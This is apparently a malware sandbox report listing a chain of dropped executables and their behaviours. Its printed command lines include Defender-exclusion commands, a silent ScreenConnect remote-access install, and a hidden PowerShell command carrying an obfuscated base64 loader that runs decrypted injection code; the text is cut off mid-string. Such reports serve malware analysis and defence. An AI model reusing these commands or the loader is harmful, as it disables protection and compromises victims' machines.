C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE"C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Users\Admin\AppData\Local\Temp\10381530101\e35a1c1713.exe"C:\Users\Admin\AppData\Local\Temp\10381530101\e35a1c1713.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5864 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3196
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381540101\4e34859d80.exe"C:\Users\Admin\AppData\Local\Temp\10381540101\4e34859d80.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1348
-
-
C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1508
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4596
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381570101\7a9f3697b2.exe"C:\Users\Admin\AppData\Local\Temp\10381570101\7a9f3697b2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe"6⤵PID:208
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:4724
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵PID:2668
-
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵PID:4672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\9⤵
- Command and Scripting Interpreter: PowerShell
PID:12880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵PID:6748
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\{8c974534-3ad7-4e90-af31-f570fca06654}\17b22516.exe"C:\Users\Admin\AppData\Local\Temp\{8c974534-3ad7-4e90-af31-f570fca06654}\17b22516.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵PID:8624
-
C:\Users\Admin\AppData\Local\Temp\{d1781515-8e26-47c9-bf34-a5609b91b72a}\cbc1762b.exeC:/Users/Admin/AppData/Local/Temp/{d1781515-8e26-47c9-bf34-a5609b91b72a}/\cbc1762b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵PID:9912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{0151554c-1b0e-4271-a505-48ece38b8685}\26409982-ecd6-4488-8672-81e093803f43.cmd" "11⤵PID:10252
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:10472
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10524
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10760
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10872
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10956
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11052
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11160
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11252
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11296
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11384
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11520
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11612
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11696
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11780
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11864
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11960
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12024
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12100
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6356
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12264
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:6244
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6372
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:6416
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6468
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12304
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12384
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12516
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12732
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6824
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:6920
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:2620
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:1800
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1456
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:8800
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1944
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:10972
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:6160
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:6564
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12532
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6984
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:4760
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:2720
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:3260
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:5060
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7240
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:7320
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:7396
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:7468
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:7540
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:7624
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:7692
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:7748
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7824
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7912
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:7992
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:8076
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8152
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:4564
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:2372
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5780
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4524
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8240
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:8312
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:8404
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8512
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:8604
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:8692
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:8760
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:8848
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:8928
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:9028
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:9124
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:9212
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:9228
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9324
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9420
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:9508
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9604
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:9688
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:9764
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:9872
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9948
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10032
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10132
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:10220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10248
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10336
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:10400
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10492
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10568
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3452
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10704
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10764
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10936
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11004
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11092
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11176
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4440
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11292
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11372
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11448
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11532
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11620
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11700
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11776
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11860
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11924
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6384
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6264
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12248
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6240
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12020
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:11980
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6456
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6520
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12328
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12476
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12852
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12776
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12692
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12588
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12536
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:4860
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:5068
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:13044
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:13152
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:13200
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:13140
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13136
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12884
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:13308
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6660
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:6676
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:5232
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 26409982-ecd6-4488-8672-81e093803f43 /f12⤵
- Modifies registry key
PID:13056
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe"6⤵PID:536
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe"6⤵PID:6836
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"6⤵PID:7124
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"7⤵PID:1276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l